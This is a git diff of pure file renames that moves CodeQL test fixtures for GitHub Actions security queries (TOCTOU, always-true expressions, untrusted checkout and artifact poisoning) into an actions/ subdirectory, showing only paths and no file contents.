diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml 
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml 
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref 
diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected 
diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml 
